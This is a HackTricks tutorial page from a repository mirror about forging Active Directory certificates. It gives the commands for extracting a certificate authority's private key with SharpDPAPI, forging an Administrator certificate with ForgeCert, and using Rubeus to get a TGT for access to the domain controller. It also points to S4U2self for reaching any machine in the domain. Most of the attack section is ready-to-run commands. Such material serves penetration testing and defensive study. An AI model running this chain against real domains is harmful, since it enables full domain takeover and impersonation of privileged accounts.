coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
75e32dc32a
hacktricks/windows-hardening/active-directory-methodology/forged-certificates.md
CPol 89f7247f49
GitBook: [#3390] No subject
2022-08-15 19:31:10 +00:00

4.0 KiB
Raw Blame History

Forged Certificates

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.

Forged Certificates

Gaining local admin access to a CA allows an attacker to extract the CA private key, which can be used to sign a forged certificate (think of this like the krbtgt hash being able to sign a forged TGT). The default validity period for a CA private key is 5 years, but this can obviously be set to any value during setup, sometimes as high as 10+ years.

Once on a CA, SharpDPAPI can extract the private keys.

.\SharpDPAPI.exe certificates /machine

# If Issuer and subject are the distinguished name of the CA, thats the one

# Save the output to a .pem file and convert it to a .pfx with openssl on Kali

Then, save the output to a .pem file and convert it to a .pfx with openssl on Kali.

Build the forged certificate with ForgeCert:

.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@cyberbotic.io" --NewCertPath fake.pfx --NewCertPassword "password"

Even though you can specify any SubjectAltName, the user does need to be present in AD. In this example, the default Administrator account is used.
Then we can simply use Rubeus to request a legitimate TGT with this forged certificate and use it to access the domain controller:

.\Rubeus.exe asktgt /user:Administrator /domain:cyberbotic.io /certificate:MIACAQ[...snip...]IEAAAA /password:password /nowrap

{% hint style="warning" %} Note that you aren't limited to forging user certificates, we can do the same for machines. Combine this with the S4U2self trick to gain access to any machine or service in the domain. {% endhint %}

Support HackTricks and get benefits!

Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!

Discover The PEASS Family, our collection of exclusive NFTs

Get the official PEASS & HackTricks swag

Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.

Share your hacking tricks submitting PRs to the hacktricks github repo.